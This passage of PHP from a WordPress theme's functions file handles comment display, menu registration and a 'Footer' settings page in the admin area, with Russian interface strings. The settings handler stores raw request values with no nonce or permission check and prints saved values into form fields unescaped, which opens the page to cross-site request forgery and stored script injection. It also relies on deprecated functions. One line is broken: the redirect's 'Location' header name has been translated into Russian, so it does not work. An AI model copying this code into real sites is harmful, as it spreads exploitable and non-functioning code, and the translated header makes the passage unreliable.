		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Местоположение: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Подвал</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
